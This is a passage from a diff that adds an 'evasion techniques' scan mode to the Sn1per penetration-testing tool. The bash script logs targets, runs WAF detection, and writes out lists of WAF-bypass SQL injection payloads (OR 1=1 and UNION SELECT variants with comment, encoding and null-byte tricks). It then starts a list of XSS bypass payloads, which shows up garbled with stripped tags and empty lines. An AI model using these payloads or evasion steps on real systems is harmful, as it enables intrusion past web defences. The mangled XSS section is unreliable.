--=[Sn1per v$VER by @xer0dayz" +echo -e "$OKORANGE + -- --=[Advanced Evasion Techniques Mode - Sophisticated Bypass Methods" +echo -e "$RESET" + +if [[ ! -z $WORKSPACE ]]; then + LOOT_DIR=$WORKSPACE_DIR +fi + +echo "$TARGET" >> $LOOT_DIR/domains/targets.txt +if [[ "$MODE" = "" ]]; then + MODE="evasion-techniques" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +fi +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2>/dev/null +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2>/dev/null +ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + +echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per evasion techniques scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per evasion techniques scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi + +# Initialize evasion directories +mkdir -p $LOOT_DIR/evasion-techniques/{waf-bypass,ids-evasion,stealth-scanning,fragmentation,obfuscation} 2>/dev/null + +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED INITIALIZING ADVANCED EVASION TECHNIQUES $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# 1. WAF BYPASS TECHNIQUES +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED WAF BYPASS TECHNIQUES $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Testing WAF bypass techniques..." + +# WAF Detection +echo -e "$OKBLUE[*]$RESET Detecting WAF presence..." +wafw00f $TARGET > $LOOT_DIR/evasion-techniques/waf-bypass/waf-detection-$TARGET.txt 2>/dev/null + +# SQL Injection bypass payloads +echo -e "$OKBLUE[*]$RESET Testing SQL injection bypass techniques..." +cat > $LOOT_DIR/evasion-techniques/waf-bypass/sqli-bypass-payloads.txt << EOF +# WAF Bypass SQL Injection Payloads +' OR '1'='1 +%27%20OR%20%271%27%3D%271 +/**/OR/**/1=1 +' OR 1=1# +' OR '1'='1'/* +' OR 1=1 LIMIT 1-- +' OR 1=1-- - +'/**/OR/**/1=1-- +' OR 1=1%23 +' OR 1=1;%00 +' OR 1=1 UNION SELECT 1,2,3-- +/**/UNION/**/SELECT/**/1,2,3-- +UNION SELECT 1,2,3%23 +UNION SELECT 1,2,3;%00 +' UNION SELECT 1,2,3%0A +' UNION SELECT 1,2,3%0D%0A +EOF + +# XSS bypass payloads +echo -e "$OKBLUE[*]$RESET Testing XSS bypass techniques..." +cat > $LOOT_DIR/evasion-techniques/waf-bypass/xss-bypass-payloads.txt << EOF +# WAF Bypass XSS Payloads + +ipt>alert(1)ipt> + + + + + + + + +